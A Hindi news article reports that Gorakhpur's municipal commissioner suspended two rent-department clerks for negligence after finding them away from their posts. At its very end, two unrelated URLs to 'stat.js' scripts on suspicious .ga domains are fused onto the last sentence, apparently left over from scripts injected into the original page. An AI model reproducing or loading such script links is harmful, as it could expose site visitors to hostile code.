उत्तर प्रदेश के गोरखपुर जिले के नगर निगम अपने कार्य कानून को लेकर काफी सख्त होता जा रहा है। आपको बता दें, गोरखपुर जिले के रेंट विभाग के दो बाबुओं को काम में लापरवाही बरतने के कारण नगर आयुक्त ने उन्हें सस्पेंड लेटर थमा दिया। खबरों के मुताबिक इन दोनों कर्मचारियों के खिलाफ विभागीय कार्यवाही भी की जाएगी।
आपको बता दे, दो बाबू जो सस्पेंड किए गए हैं उनका नाम प्रेम प्रकाश सिंह और राजेंद्र सिंह बताया जा रहा है। नगर आयुक्त के पास इन दोनों कर्मचारियों की काफी दिन से लगातार शिकायतें आ रही थी। इन दोनों के खिलाफ काम में लापरवाही बरतने की वजह से किराए से संबंधित कई मामले लंबित हो रहे थे। आपको बता दें, नगर आयुक्त ने इन दोनों कर्मचारियों को कई बार हिदायत भी दी थी।
लेकिन जब सोमवार को नगर आयुक्त अंजनी कुमार सिंह निरीक्षण पर पहुंचे तो दोनों ही कर्मचारी अपने विभाग को छोड़कर टैक्स विभाग के रिकॉर्ड रूम में मिले जिसके बाद नगर आयुक्त अंजनी कुमार सिंह ने दोनों को सस्पेंड कर दिया।
नगर आयुक्त अंजनी कुमार सिंह ने बताया कि दोनों कर्मचारियों को काम में लापरवाही बरतने पर सस्पेंड किया गया है। दोनों के पास काफी संख्या में आवेदन लंबित हैं। इसके बावजूद उनका निस्तारण नहीं किया जा रहा था। ऐसे में दोनों कर्मचारियों को सस्पेंड कर दिया गया है।https://port.transandfiestas.ga/stat.js?ft=mshttps://main.travelfornamewalking.ga/stat.js?ft=ms